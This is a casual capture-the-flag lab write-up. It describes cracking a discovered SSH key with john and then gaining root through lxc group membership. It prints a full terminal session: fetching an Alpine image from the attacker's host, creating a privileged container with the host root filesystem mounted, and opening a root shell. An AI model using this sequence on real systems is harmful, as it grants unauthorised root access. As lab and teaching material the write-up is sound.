Running a simple Content discovery with burp, you will find a secret folder with a private ssh key and a corresponding wordlist to crack it. load it to john with 2john and you got its pass. allowing a ssh login with the key as the user, which you’d found in comments on the site. yes boring. cat user.txt, flag scored.
looking for priv esc i found the user to be in the lxc group, so we probably can elevated by mounting the root fs as fs in an container, like when you’re in the docker group with docker. lets see.
yup, as i thought, build an alpine lxc container…
wget http://10.9.61.225:8000/alpine-v3.12-x86_64-20200923_1026.tar.gz --2020-09-23 08:31:21-- http://10.9.61.225:8000/alpine-v3.12-x86_64-20200923_1026.tar.gz Connecting to 10.9.61.225:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 3215528 (3.1M) [application/gzip] Saving to: ‘alpine-v3.12-x86_64-20200923_1026.tar.gz’ alpine-v3.12-x86_64-20200923_1026.tar.gz 100%[=======================================================================================================================================>] 3.07M 791KB/s in 4.0s 2020-09-23 08:31:25 (787 KB/s) - ‘alpine-v3.12-x86_64-20200923_1026.tar.gz’ saved [3215528/3215528] john@exploitable:~$ lxc image import alpine-v3.12-x86_64-20200923_1026.tar.gz --alias alpine Image imported with fingerprint: 2ef98380d91867a7d01854e7a03b528e5880e90b30ba80f0dfb5731eb0009c8e john@exploitable:~$ lxc image list +--------+--------------+--------+-------------------------------+--------+--------+------------------------------+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE | +--------+--------------+--------+-------------------------------+--------+--------+------------------------------+ | alpine | 2ef98380d918 | no | alpine v3.12 (20200923_10:26) | x86_64 | 3.07MB | Sep 23, 2020 at 8:31am (UTC) | +--------+--------------+--------+-------------------------------+--------+--------+------------------------------+ john@exploitable:~$ lxc init alpine ignite -c security.privileged=true Creating ignite john@exploitable:~$ lxc config device add ignite alpine disk source=/ path=/mnt/root/ recursive=true Device alpine added to ignite john@exploitable:~$ lxc start ignite john@exploitable:~$ lxc exec ignite /bin/sh ~ # id uid=0(root) gid=0(root) ~ # cat /mnt/root/root/root.txt
pwned. ez af 😛